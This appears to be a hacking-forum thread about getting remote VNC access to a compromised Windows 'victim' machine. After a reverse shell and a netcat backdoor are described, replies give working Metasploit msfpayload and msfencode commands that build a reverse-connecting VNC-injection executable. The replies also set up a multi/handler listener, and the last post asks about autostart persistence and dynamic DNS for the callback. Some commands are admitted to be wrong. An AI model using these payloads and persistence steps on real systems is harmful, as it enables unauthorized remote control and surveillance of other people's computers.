Problem With Exec VNC on Victim Comp

[wolf17]

Hey guys,

This is my first post! As many...i've been lurking around this forum for months and months soaking in all the information.

My question:

I've managed to exploit my victim pc and gained my reverse shell. I drop myself a nc and go on home for the day. The next day I login via my nc - another shell great. I go ahead and compile myself a nice ultravnc server and toss it onto the victim remotely. I transfer the winvnc.exe and ultravnc.ini(think thats the name) file for the settings. I type "start winvnc.exe" and check - yes its running.

Now back on bt3 i run wine vncviewer.exe I type the Ip - seems to connect. Then prompt for password...sounds good. Enter my password ...and then bam! connection closed.(note it does not state incorrect password)

I tried to connect via windows vncviewer - take me all the way to password, accepts password and then i get a socket write error. I have googled this, but have not come to a distinct answer. Im using the latest ultravnc release.

PS
1. I have also tried a realvnc server to upload - still problems connecting.
2. Im running BT3 on a VM on same computer as my victim.
3. If i load the same vnc server manually via flashdrive onto a victim comp and try to connect via wine vncviewer on BT3 it works fine.
4. I have already watched purehates video.

Thanks in advance!

[BigMac]

i would use msfpayload...

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe

that will generate a win32 executable payload located in this directory /pentest/exploit/framework3/

before you send this to your victim you need to start a multi handler... start metasploit then use these commands...

use exploit/multi/handler
set PAYLOAD windows/vncinject/reverse_tcp
set LHOST 192.168.1.5
set LPORT 999

Note: lhost and lport must be the same in both the executable and the multi handler... lhost is the ip address of the attacking computer(backtrack)...

now that you have the multi handler set up to listen for incoming connections all you need to do now is send the payload to the victim to execute...

[kazalku]

i would use msfpayload...

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe

I got an error msg:

bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.4 LPORT=999 X -o reverse_vnc.exe
Error generating payload: The argument could not be parsed correctly.

This one worked for me:

bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.4 LPORT=999 R | ./msfencode -b '' -t exe -o reverse_vnc.exe
[*] x86/shikata_ga_nai succeeded with size 306 (iteration=1)

[BigMac]

my syntax is wrong... im lazy... sorry... you can search the forum for msfpayload, i have made lots of post on the subject...

[kazalku]

The intension was not to find error in your command, I was wondering that may be I was missing something. I thought that may be it's possible to do the same job with shorter command (as your one).. anyway, it's sorted. Thanks for the approach.

[coool]

Code:

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 X -o reverse_vnc.exe

that command not work , why use X -o understand ? test with command

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.5 LPORT=999 V > /tmp/reverse_vnc.exe
don't forgot use DisableCourtesyShell=True if you want Disable this
http://img140.imageshack.us/img140/8664/vnc.png
I don't know if can modify code add some thing like enable trans file VNC and put auto to Startup windows and if can use no-ip without real ip I hop if can because some time disconnection internet but if use no-ip is very nice

any on have some info about that tell me !